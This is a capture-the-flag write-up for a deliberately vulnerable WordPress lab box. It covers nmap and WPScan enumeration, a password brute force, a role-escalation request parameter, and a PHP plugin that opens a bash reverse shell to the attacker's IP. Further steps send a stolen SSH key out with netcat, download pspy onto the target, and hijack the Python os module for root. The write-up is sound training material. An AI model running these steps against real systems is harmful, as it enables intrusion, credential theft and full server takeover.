Great box to learn about the various ways of enumerating and exploiting WordPress.
In order to gain access you are required to enumerate the box using WPScan, however sufficient information to fully compromise the box is only obtained by doing further enumeration (read TRY HARDER) using Nmap scripts.
Lastly, before you begin add “jack.thm” to your hosts file(/etc/hosts) as its required for name resolution.
We can start the enumeration process by using nmap to see which ports the host is listening on. I typically start enumerating the top 20 ports in order to save time, while a full port scan continues running in the background. This allows me to get a good feeling of the tech used on the box and occasionally I have gained low privilege access to the box before the full port enumeration even completes.
sudo nmap — top-ports 20 -sC -sV <IP Address> — open
The Nmap scan reveals that Port 22 and Port 80 is open and running OpenSSH 7.2p2 and Apache 2.4.18 respectively.
From experience we know SSH is rarely vulnerable so lets focus on port 80 rather.
The server is running Jack’s personal blog.
There is no obvious indication what blogging framework is being used so lets enumerate further using “whatweb” to see what tech is running this blog
whatweb <IP Address> — verbose
Now that we know the site is running Wordpress 5.3.2 we can start to enumerate some more specific information such as Plugins, Themes, Users, Config Backups, DB Exports and more. My tool of choice for Wordpress enumeration is WPScan.
We can use WPScan to enumerate the above items using the following command
wpscan — url http://jack.thm — enumerate ap,at,u — detection-mode aggressive
- ap = All Plugins
- at = All Themes
- u = Enumerate Users
- Detection-Mode = Since we’re not worried about being detected we can use aggressive mode which occasionally delivers more results at the cost of generating more noise.
Our results show that we have 3 users of value but very little else in terms of vulnerable plugins or themes.
Our next step will be to see if we can get a valid password for one of the three users. From our WPScan we can see that XML-RPC is accessible so we can use WPScan to execute the bruteforce attack.
wpscan — url http://jack.thm -U name1,name2,name3 -P /usr/share/wordlist/<wordlist of choice>
Note that I used a shorter password list than the rockyou.txt one. For these labs I typically leave a bruteforce attack running for no more than 30min before moving on to a different password list or method. In this case it paid off and I quickly obtained a password for one of the accounts.
Now that we have enough information lets continue with the exploitation.
We can start by logging into Jack’s Wordpress site at http://jack.thm/wp-admin using the credentials obtained earlier.
Once logged in we realise that theres not much we can do so we need to enumerate a little more (TRY HARDER). This also teaches us a valuable lesson, DON’T ALWAYS TRUST THE OUTPUT FROM A SINGLE TOOL!
There are multiple other tools to enumerate Wordpress with, but lets revert back to good ole Nmap with the following command
sudo nmap -p 80 — script=http-wordpress-enum* — script-args search-limit 100 jack.thm
And BINGO we have our next piece of the puzzle, a plugin with a known Wordpress privilege escalation vulnerability called user-role-editor.
A simple searchsploit search reveals the specific exploit
Although we won’t use this specific exploit as it requires Metasploit, we can evaluate the ruby exploit to understand how to manually perform the exploitation ala OSCP!
After reviewing the exploit and some simple googling I constructed a fairly simple procedure using Burpsuite to gain privileged access to the Wordpress portal.
- Log into Wordpress using obtained credentials
- Select “Profile”
- Start Burpsuite or http proxy of choice and start capturing web traffic
- Select “Update Profile”
- In Burpsuite take a look at the captured HTTP POST and add the following string at the end of the post “&ure_other_roles=administrator”
- Click “Forward” to submit the HTTP Request and refresh the Wordpress Admin page, now showing more admin options, including the “Plugins” Menu
Next we need to get a reverse shell. In order to get the reverse shell I will create a custom Wordpress plugin containing a simple PHP Reverse Shell.
Create a new PHP file on your attack machine containing the following. I called it shell-plugin.php
* Plugin Name: Reverse Shell
* Plugin URI:
* Description: Reverse Shell
* Version: 1.0
* Author: H4SH95
* Author URI: H@PPY D@Y5
exec(“/bin/bash -c ‘bash -i >& /dev/tcp/<YOUR IP>/80 0>&1’”);
Create a zip file from from the above PHP file using the following
zip shell-plugin.zip ./shell-plugin.php
- start your netcat listener
sudo nc -nlvp 80
Next we’ll upload the plugin using the following steps and activate our reverse shell.
- Select “Plugins” then “Add New”
- Select “Upload Plugin”
- Select “Browse”
- Select your Plugin zip file and “Install Now”
- Click “Activate Now” and check your listener
- Ta F@#$king Da!!!
During the enumeration process I found a file in “/home/jack” called “reminder.txt”. This file led me to “/var/backups” where I found a SSH Private key to use for authentication called “id_rsa”
In order to use the file we first need to transfer the file to our attack machine, I used netcat with the following steps to transfer the file.
- On the attack machine start your netcat listener to receive the file “sudo nc -nlvp 443 > id_rsa”
- On the target send the file to the attack machine using netcat by issueing the following command “nc -nv <ATTACK IP> 443 < id_rsa”
Once you have the file on the attack machine we can use it to gain acccess to the target using ssh.
- Assign the correct privileges to the ssh key using the following command “chmod 600 id_rsa”
- ssh -i id_rsa jack@<TARGET IP>
Once I gained access to the target I spent a lot of time enumerating various things but nothing led me to a clear indication of how to Priv Esc.
The one thing you will notice is that we have write access to various python modules, and this typically indicates we may be able to use a python module for privilege escalation. The missing piece now is a python script running as root.
After more enumeration and not finding anything specific I downloaded pspy an underprivileged Linux Process Checker from https://github.com/DominicBreuker/pspy
I transferred the file from my attack host to the target by hosting the file and downloading it to the target using wget
- On attack machine start a python web server using sudo python3 -m http.server 443
- On the target download the file to /tmp using wget http://<ATTACK IP>:443/pspy64 -O /tmp/pspy64
- chmod +x /tmp/pspy64
After monitoring the output from pspy64 for a while a noticed theres a script running every so often, “/opt/statuscheck/checker.py”
It appears the script does a simple http query to http://localhost using curl and then outputs everything to /opt/statuscheck/output.log.
When we take a look at the python script you’ll notice that it actually imports the Python OS module.
Checking the rights we see that the family group of which we are a member has sufficient rights to the file.
Follow these steps to gain Privileged Access
- start your listener on the attack machine sudo nc -nlvp 443
- Edit the os.py file and add the following to the end of the file
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
wait a minute or two and there you go!!!